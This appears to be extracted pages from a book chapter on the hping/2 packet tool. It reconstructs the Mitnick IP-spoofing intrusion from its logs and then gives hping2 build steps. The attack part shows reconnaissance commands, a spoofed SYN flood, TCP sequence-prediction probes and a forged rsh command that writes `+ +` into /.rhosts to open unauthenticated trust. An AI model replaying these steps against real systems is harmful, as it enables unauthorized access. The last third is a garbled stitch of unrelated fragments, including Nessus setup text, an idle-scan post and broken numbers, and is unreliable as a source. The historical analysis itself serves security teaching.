As can be seen from the following logs, the attack began with suspicious probes from a privileged root account on toad.com. (Remember, the attacker’s intent is to locate an initial target with some form of internal network trust relationship.) As Shi- momura pointed out, it’s obvious from the particular service probes that Mitnick was seeking an exploitable trust relationship here: 14:09:32 toad.com# finger -l @target 14:10:21 toad.com# finger -l @server 14:10:50 toad.com# finger -l root@server 14:11:07 toad.com# finger -l @x-terminal 14:11:38 toad.com# showmount -e x-terminal 14:11:49 toad.com# rpcinfo -p x-terminal 14:12:05 toad.com# finger -l root@x-terminal Fingering an account (-l for long or extensive output) returns useful discovery infor- mation about that account. Although the information returned varies from daemon to daemon and account to account, some systems finger reports whether the user is cur- rently in session. Other systems return information that includes user’s full name, address, and/or telephone number(s). The finger process is relatively simple: A finger client issues an active open to this port and sends a one-line query with login data. The server processes the query, returns the output, and closes the connection. The output received from port 79 is considered very sensitive, as it can reveal detailed information on users. The second command, displayed in the foregoing log excerpt, is showmount (with the -e option); it is typically used to show how an NFS server is exporting its file systems. It also works over the network, indicating exactly what an NFS client is being offered. The rpcinfo command (with -p option) is a Portmap query. The Portmap dae- mon converts RPC program numbers into port numbers. When an RPC server starts up, it registers with the Portmap daemon. The server tells the daemon to which port number it is listening and which RPC program numbers it serves. Therefore, the Portmap daemon knows the location of every registered port on the host and which programs are available on each of these ports. The next log incision is the result of a TCP SYN attack to port 513 on the server from a phony address of 130.92.6.97. TCP port 513, login, is considered a “privileged” port; as such, it has become a target for address spoofing. The SYN-ACK (three-way) handshake is when a connection is established between two nodes during a TCP session; it is nec- essary for unambiguous synchronization of both ends of the connection. This process allows both sides to agree upon a number sequencing method for tracking bytes within the communication streams back and forth. The first node requests communication by sending a packet with a sequence number and SYN bit. The second node responds with an ACK that contains the sequence number plus1 and its own sequence number back to the first node. At this point, the first node will respond and communication between the two nodes will proceed. When there is no more data to send, a TCP node may send a FIN bit, indicating a close control signal. In this case, the source IP address in the packet is spoofed, or replaced, with an address that is not in use on the Internet (i.e., it belongs to another computer). An attacker will send numerous TCP SYNs to tie up resources on the target system. Upon receiving the connection request, the target server allocates resources to handle and track this new communication session; then it hping/2 319 responds with a SYN-ACK. The response is sent to the spoofed, or nonexistent, IP address and thus will not respond to any new connections. As a result, no response is received to the SYN-ACK. The target, therefore, gives up on receiving a response and reallocates the resources that were set aside earlier: 14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0) win 4096 14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096 14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0) win 4096 14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0) win 4096 14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0) win 4096 14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0) win 4096 14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0) win 4096 14:18:23.103275 130.92.6.97.607 > server.login: S 1382726967:1382726967(0) win 4096 14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0) win 4096 14:18:23.225384 130.92.6.97.609 > server.login: S 1382726969:1382726969(0) win 4096 14:18:23.282625 130.92.6.97.610 > server.login: S 1382726970:1382726970(0) win 4096 14:18:23.342657 130.92.6.97.611 > server.login: S 1382726971:1382726971(0) win 4096 14:18:23.403083 130.92.6.97.612 > server.login: S 1382726972:1382726972(0) win 4096 14:18:23.903700 130.92.6.97.613 > server.login: S 1382726973:1382726973(0) win 4096 14:18:24.003252 130.92.6.97.614 > server.login: S 1382726974:1382726974(0) win 4096 14:18:24.084827 130.92.6.97.615 > server.login: S 1382726975:1382726975(0) win 4096 14:18:24.142774 130.92.6.97.616 > server.login: S 1382726976:1382726976(0) win 4096 14:18:24.203195 130.92.6.97.617 > server.login: S 1382726977:1382726977(0) win 4096 14:18:24.294773 130.92.6.97.618 > server.login: S 1382726978:1382726978(0) win 4096 14:18:24.382841 130.92.6.97.619 > server.login: S 1382726979:1382726979(0) win 4096 14:18:24.443309 130.92.6.97.620 > server.login: S 1382726980:1382726980(0) win 4096 14:18:24.643249 130.92.6.97.621 > server.login: S 1382726981:1382726981(0) win 4096 320 Chapter 10 14:18:24.906546 130.92.6.97.622 > server.login: S 1382726982:1382726982(0) win 4096 14:18:24.963768 130.92.6.97.623 > server.login: S 1382726983:1382726983(0) win 4096 14:18:25.022853 130.92.6.97.624 > server.login: S 1382726984:1382726984(0) win 4096 14:18:25.153536 130.92.6.97.625 > server.login: S 1382726985:1382726985(0) win 4096 14:18:25.400869 130.92.6.97.626 > server.login: S 1382726986:1382726986(0) win 4096 14:18:25.483127 130.92.6.97.627 > server.login: S 1382726987:1382726987(0) win 4096 14:18:25.599582 130.92.6.97.628 > server.login: S 1382726988:1382726988(0) win 4096 14:18:25.653131 130.92.6.97.629 > server.login: S 1382726989:1382726989(0) win 4096 Shimomura next identified 20 connection attempts from apollo.it.luc.edu to the X terminal shell and indicated the purpose of these attempts—that they were meant to reveal the behavior of the X terminal’s TCP number sequencing. To avoid flooding the X terminal connection queue, the initial sequence numbers were incremented by 1 for each connection, indicating that the SYN packets were not being generated. Note the X terminal SYN-ACK packet’s analogous sequence incrementation, as follows: 14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell: S 1382726990:1382726990(0) win 4096 14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991 win 4096 14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R 1382726991:1382726991(0) win 0 14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell: S 1382726991:1382726991(0) win 4096 14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S 2021952000:2021952000(0) ack 1382726992 win 4096 14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0 14:18:26.775395 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0 14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S 1382726992:1382726992(0) win 4096 14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 2022080000:2022080000(0) ack 1382726993 win 4096 14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell: R 1382726993:1382726993(0) win 0 14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell: S 1382726993:1382726993(0) win 4096 14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997: S 2022208000:2022208000(0) ack 1382726994 win 4096 hping/2 321 14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell: R 1382726994:1382726994(0) win 0 14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell: S 1382726994:1382726994(0) win 4096 14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996: S 2022336000:2022336000(0) ack 1382726995 win 4096 14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell: R 1382726995:1382726995(0) win 0 14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell: S 1382726995:1382726995(0) win 4096 14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995: S 2022464000:2022464000(0) ack 1382726996 win 4096 14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell: R 1382726996:1382726996(0) win 0 14:18:29.074990 apollo.it.luc.edu.994 > x-terminal.shell: S 1382726996:1382726996(0) win 4096 14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994: S 2022592000:2022592000(0) ack 1382726997 win 4096 14:18:29.354139 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0 14:18:29.354616 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0 14:18:29.584705 apollo.it.luc.edu.993 > x-terminal.shell: S 1382726997:1382726997(0) win 4096 14:18:29.755054 x-terminal.shell > apollo.it.luc.edu.993: S 2022720000:2022720000(0) ack 1382726998 win 4096 14:18:29.840372 apollo.it.luc.edu.993 > x-terminal.shell: R 1382726998:1382726998(0) win 0 14:18:30.094299 apollo.it.luc.edu.992 > x-terminal.shell: S 1382726998:1382726998(0) win 4096 14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992: S 2022848000:2022848000(0) ack 1382726999 win 4096 14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell: R 1382726999:1382726999(0) win 0 14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S 1382726999:1382726999(0) win 4096 14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S 2022976000:2022976000(0) ack 1382727000 win 4096 14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win 0 14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win 4096 14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack 1382727001 win 4096 14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0 14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096 14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096 322 Chapter 10 TEAMFLY Team-Fly ® 14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0 14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win 4096 14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack 1382727003 win 4096 14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win 0 14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win 4096 14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack 1382727004 win 4096 14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win 0 14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win 4096 14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack 1382727005 win 4096 14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win 0 14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win 4096 14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack 1382727006 win 4096 14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win 0 14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win 4096 14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack 1382727007 win 4096 14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win 0 14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win 4096 14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack 1382727008 win 4096 14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win 0 14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win 4096 14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096 14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win 0 14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096 14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096 14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0 hping/2 323 Next, we witness the forged connection requests from the masqueraded server (login) to the X terminal with the predicted sequencing by the attacker. This is based on the previous discovery of X terminal’s TCP sequencing. With this spoof, the attacker (in this case, Mitnick) has control of communication to the X terminal shell masquer- aded from the server login: 14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096 14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096 14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096 14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096 14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096 14:18:37 server# rsh x-terminal “echo + + >>/.rhosts” 14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096 14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096 14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096 14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096 14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096 Then, the connections are reset to empty the connection queue for the server login so that connections may again be accepted: 14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096 14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096 14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096 14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096 14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096 14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096 14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096 14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096 14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096 14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096 14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096 14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096 324 Chapter 10 14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096 14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096 14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096 14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096 14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096 14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096 14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096 14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096 14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096 14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096 14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096 14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096 14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096 14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096 14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096 14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096 14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096 14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096 Soon after gaining root access from IP address spoofing, Mitnick compiled a kernel module that was forced onto an existing STREAMS stack and intended to take control of a tty (terminal) device. System Requirements The following are the minimum system requirements for hping/2: ■■ Linux, FreeBSD, NetBSD, OpenBSD, or Solaris. ■■ 3.5 MB of free hard disk space. ■■ With Linux—the uid 0 is required; with FreeBSD, NetBSD, and OpenBSD—the libpcap and the gmake utilities are required. hping/2 325 Linux Installation and Configuration After downloading or copying file hping2.0.0-rc1.tar.gz to a directory on your hard drive, follow these steps for Linux systems: Step 1. Open a terminal session and cd to the partition or directory to where you placed the program file. Step 2. The file probably contains the .gz extension and must be uncompressed by using the gzip command. Type gzip -d hping2.0.0-rc1.tar.gz. Step 3. The installation file will be uncompressed and the .gz will be removed, leaving only hping2.0.0-rc1.tar. Extract this tar archive by issuing the following tar command: tar xvf hping2.0.0-rc1.tar. Step 4. The program files will be extracted and copied to an hping/2 directory. Change directories to the new directory by typing cd hping2. In the subdirec- tory, you can issue the ls command to see its contents shown here: # ls AUTHORS getusec.c memlockall.c sendip.c binding.c globals.h memlock.c sendip_handler.c BUGS hcmp.h memstr.c sendrawip.c byteorder.c hgetopt.c memunlockall.c sendtcp.c CHANGES hgetopt.h memunlock.c sendudp.c cksum.c hping2.h MIRRORS signal.c configure if_promisc.c NEWS sockopt.c COPYING INSTALL opensockraw.c statistics.c CVS ip_opt_build.c parseoptions.c TODO datafiller.c KNOWN-BUGS README usage.c datahandler.c libpcap_stuff.c release.h utils display_ipopt.c linux_sockpacket.c relid.c version.c docs listen.c resolve.c waitpacket.c gethostname.c logicmp.c rtt.c getifname.c main.c sendhcmp.c getlhs.c Makefile.in sendicmp.c Step 5. You’ll need to configure the software by issuing the ./configure command. You can view help by typing ./configure —help to see the following notice: # ./configure —help configure help: —help show this help —force-libpcap build a libpcap based binary under linux —dont-limit-when-suid when suid allows to use all options even if uid != euid 326 Chapter 10 Complete this step by issuing the configure command as shown here: # ./configure build byteorder.c create byteorder.h ——————————————————— system type: LINUX LIMITWHENSUID: -DLIMITWHENSUID FORCE_LIBPCAP: LIBPCAP : PCAP_INCLUDE : MANPATH : /usr/local/man (to modify try configure —help) ——————————————————— creating Makefile now you can try ’make’ NOTE You’ll need root privileges to complete the installation. If you’ve logged in with a user account, simply issue the su command and enter the root password to grant these privileges. Step 6. Build and install the package by issuing the make command, shown here: # make all gcc -c -O2 -Wall -g -DLIMITWHENSUID main.c main.c: In function ’main’: main.c:229: warning: implicit declaration of function ’time’ gcc -c -O2 -Wall -g -DLIMITWHENSUID getifname.c getifname.c: In function ’get_if_name’: getifname.c:141: warning: implicit declaration of function ’exit’ gcc -c -O2 -Wall -g -DLIMITWHENSUID getlhs.c gcc -c -O2 -Wall -g -DLIMITWHENSUID linux_sockpacket.c gcc -c -O2 -Wall -g -DLIMITWHENSUID parseoptions.c gcc -c -O2 -Wall -g -DLIMITWHENSUID datafiller.c datafiller.c: In function ’datafiller’: datafiller.c:74: warning: implicit declaration of function ’exit’ gcc -c -O2 -Wall -g -DLIMITWHENSUID datahandler.c gcc -c -O2 -Wall -g -DLIMITWHENSUID gethostname.c gcc -c -O2 -Wall -g -DLIMITWHENSUID binding.c gcc -c -O2 -Wall -g -DLIMITWHENSUID getusec.c gcc -c -O2 -Wall -g -DLIMITWHENSUID opensockraw.c gcc -c -O2 -Wall -g -DLIMITWHENSUID logicmp.c gcc -c -O2 -Wall -g -DLIMITWHENSUID waitpacket.c gcc -c -O2 -Wall -g -DLIMITWHENSUID resolve.c resolve.c: In function ’resolve’: resolve.c:37: warning: implicit declaration of function ’exit’ hping/2 327 gcc -c -O2 -Wall -g -DLIMITWHENSUID sendip.c gcc -c -O2 -Wall -g -DLIMITWHENSUID sendicmp.c sendicmp.c: In function ’send_icmp_echo’: sendicmp.c:95: warning: implicit declaration of function ’time’ gcc -c -O2 -Wall -g -DLIMITWHENSUID sendudp.c sendudp.c: In function ’send_udphdr’: sendudp.c:72: warning: implicit declaration of function ’time’ gcc -c -O2 -Wall -g -DLIMITWHENSUID sendtcp.c sendtcp.c: In function ’send_tcphdr’: sendtcp.c:91: warning: implicit declaration of function ’time’ gcc -c -O2 -Wall -g -DLIMITWHENSUID cksum.c gcc -c -O2 -Wall -g -DLIMITWHENSUID statistics.c statistics.c: In function ’print_statistics’: statistics.c:46: warning: implicit declaration of function ’exit’ gcc -c -O2 -Wall -g -DLIMITWHENSUID usage.c usage.c: In function ’show_usage’: usage.c:90: warning: implicit declaration of function ’exit’ gcc -c -O2 -Wall -g -DLIMITWHENSUID version.c version.c: In function ’show_version’: version.c:24: warning: implicit declaration of function ’exit’ gcc -c -O2 -Wall -g -DLIMITWHENSUID hgetopt.c gcc -c -O2 -Wall -g -DLIMITWHENSUID sockopt.c gcc -c -O2 -Wall -g -DLIMITWHENSUID listen.c gcc -c -O2 -Wall -g -DLIMITWHENSUID sendhcmp.c gcc -c -O2 -Wall -g -DLIMITWHENSUID memstr.c gcc -c -O2 -Wall -g -DLIMITWHENSUID rtt.c gcc -c -O2 -Wall -g -DLIMITWHENSUID relid.c gcc -c -O2 -Wall -g -DLIMITWHENSUID sendip_handler.c gcc -c -O2 -Wall -g -DLIMITWHENSUID libpcap_stuff.c gcc -c -O2 -Wall -g -DLIMITWHENSUID memlockall.c gcc -c -O2 -Wall -g -DLIMITWHENSUID memunlockall.c gcc -c -O2 -Wall -g -DLIMITWHENSUID memlock.c gcc -c -O2 -Wall -g -DLIMITWHENSUID memunlock.c gcc -c -O2 -Wall -g -DLIMITWHENSUID ip_opt_build.c gcc -c -O2 -Wall -g -DLIMITWHENSUID display_ipopt.c gcc -c -O2 -Wall -g -DLIMITWHENSUID sendrawip.c gcc -c -O2 -Wall -g -DLIMITWHENSUID signal.c gcc -o hping2 -O2 -Wall -g main.o getifname.o getlhs.o linux_sockpacket.o parseoptions.o datafiller.o datahandler.o gethostname.o binding.o getusec.o opensockraw.o logicmp.o waitpacket.o resolve.o sendip.o sendicmp.o sendudp.o sendtcp.o cksum.o statistics.o usage.o version.o hgetopt.o sockopt.o listen.o sendhcmp.o memstr.o rtt.o relid.o sendip_handler.o libpcap_stuff.o memlockall.o memunlockall.o memlock.o memunlock.o ip_opt_build.o display_ipopt.o sendrawip.o signal.o ./hping2 -v hping version 2.0.0 release candidate 1 ($date:$) linux sockpacket based binary use ’make strip’ to strip hping2 binary use ’make install’ to install hping2 328 Chapter 10 [...]... interface selected (according to /proc) HPING www.yahoo.com (ppp0 204 .71 .200 .74 ): A set, 40 headers + 0 data bytes 40 bytes from 204 .71 .200 .74 : flags=R seq=0 ttl=53 id=296 07 win=0 rtt=329.4 ms 40 bytes from 204 .71 .200 .74 : flags=R seq=1 ttl=53 id=31549 win=0 rtt=390.0 ms 40 bytes from 204 .71 .200 .74 : flags=R seq=2 ttl=53 id=33432 win=0 rtt=390.0 ms 40 bytes from 204 .71 .200 .74 : flags=R seq=3 ttl=53 id=35368... 204 .71 .200 .74 : flags=R seq=3 ttl=53 id=35368 win=0 rtt=380.0 ms 40 bytes from 204 .71 .200 .74 : flags=R seq=4 ttl=53 id= 373 35 win=0 rtt=390.0 ms 40 bytes from 204 .71 .200 .74 : flags=R seq=5 ttl=53 id=391 57 win=0 rtt=380.0 ms 40 bytes from 204 .71 .200 .74 : flags=R seq=6 ttl=53 id=41118 win=0 rtt= 370 .0 ms 40 bytes from 204 .71 .200 .74 : flags=R seq =7 ttl=53 id=43330 win=0 rtt=390.0 ms —- www.yahoo.com hping statistic —8... id=+1 871 win=0 rtt=350.0 ms 40 bytes from 204 .71 .200.68: flags=R seq=5 ttl=53 id=+1932 win=0 rtt=340.0 ms 40 bytes from 204 .71 .200.68: flags=R seq=6 ttl=53 id=+ 177 6 win=0 rtt=330.0 ms 40 bytes from 204 .71 .200.68: flags=R seq =7 ttl=53 id=+ 174 9 win=0 rtt=320.0 ms 40 bytes from 204 .71 .200.68: flags=R seq=8 ttl=53 id=+1888 win=0 rtt=340.0 ms 40 bytes from 204 .71 .200.68: flags=R seq=9 ttl=53 id=+19 07 win=0... information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your Nessus daemon will be able to retrieve this information CA certificate life time in days [1460]: Server certificate life time in days [365]: Your country (two letter code) [FR]: US Your state or province name [none]: Your location (e.g town) [Paris]: Naples Your organization [Nessus Users... a given software is immune to a security problem Ninety-five percent of the security checks will actually perform their job, so you should try to overflow your buffers, relay some mails, and even crash your computer! Complete Reports Nessus will not only tell you what’s wrong on your network, but will, most of the time, tell you how to prevent crackers from exploiting the security holes found and will... “marked,” so in order to discover if an host is a Windows host you need to send just some packet How to perform spoofed SYN scan using incremental id? The following is the original message to bugtraq about spoofed/indirect/idle scan method, bottom i’ll try to explain details and how this is possible even with UDP with some restriction As you can see spoofed scanning is travial to perform, especially... following tar command: tar xvf nessus-libraries-x.x.x.tar Step 4 The program files will be extracted and copied to a nessus-libraries-x.x.x directory Change directories to the new directory by typing cd nessuslibraries-x.x.x In the subdirectory, you can issue the ls command to see its contents, shown here: # ls aclocal.m4 config.guess config.sub configure nessus.in configure.in include INSTALL_README install-sh... Each security test is written as an external plugin This means that you can easily add your own tests without having to read the code of the nessusd engine Nessus Attack Scripting Language Nessus Security Scanner includes Nessus Attack Scripting Language (NASL), a language designed to write security tests easily and quickly (Security checks can also be written in the C programming language.) Up -to- Date... nessus-installer.sh Simply download and copy the file to your home directory, open a terminal, change to your home directory, and at the terminal prompt type sh nessus-installer.sh You should see something like the following output: -Nessus installation : Ready to install -Nessus is now ready to be installed on this host The installation... www.yahoo.com (ppp0 204 .71 .200.68): A set, 40 headers + 0 data bytes 40 bytes from 204 .71 .200.68: flags=R seq=0 ttl=53 id=65 179 win=0 rtt=3 27. 1 ms 40 bytes from 204 .71 .200.68: flags=R seq=1 ttl=53 id=+1936 win=0 rtt=360.0 ms 40 bytes from 204 .71 .200.68: flags=R seq=2 ttl=53 id=+1880 win=0 rtt=340.0 ms 40 bytes from 204 .71 .200.68: flags=R seq=3 ttl=53 id=+1993 win=0 rtt=330.0 ms 40 bytes from 204 .71 .200.68: flags=R . R 138 272 6 977 :138 272 6 977 (0) win 4096 14:18:53.4 372 87 130.92.6. 97. 618 > server.login: R 138 272 6 978 :138 272 6 978 (0) win 4096 14:18:53.49 678 9 130.92.6. 97. 619 > server.login: R 138 272 6 979 :138 272 6 979 (0). S 138 272 6 977 :138 272 6 977 (0) win 4096 14:18:24.29 477 3 130.92.6. 97. 618 > server.login: S 138 272 6 978 :138 272 6 978 (0) win 4096 14:18:24.382841 130.92.6. 97. 619 > server.login: S 138 272 6 979 :138 272 6 979 (0). R 138 272 6 972 :138 272 6 972 (0) win 4096 14:18:53.116850 130.92.6. 97. 613 > server.login: R 138 272 6 973 :138 272 6 973 (0) win 4096 14:18:53. 177 515 130.92.6. 97. 614 > server.login: R 138 272 6 974 :138 272 6 974 (0)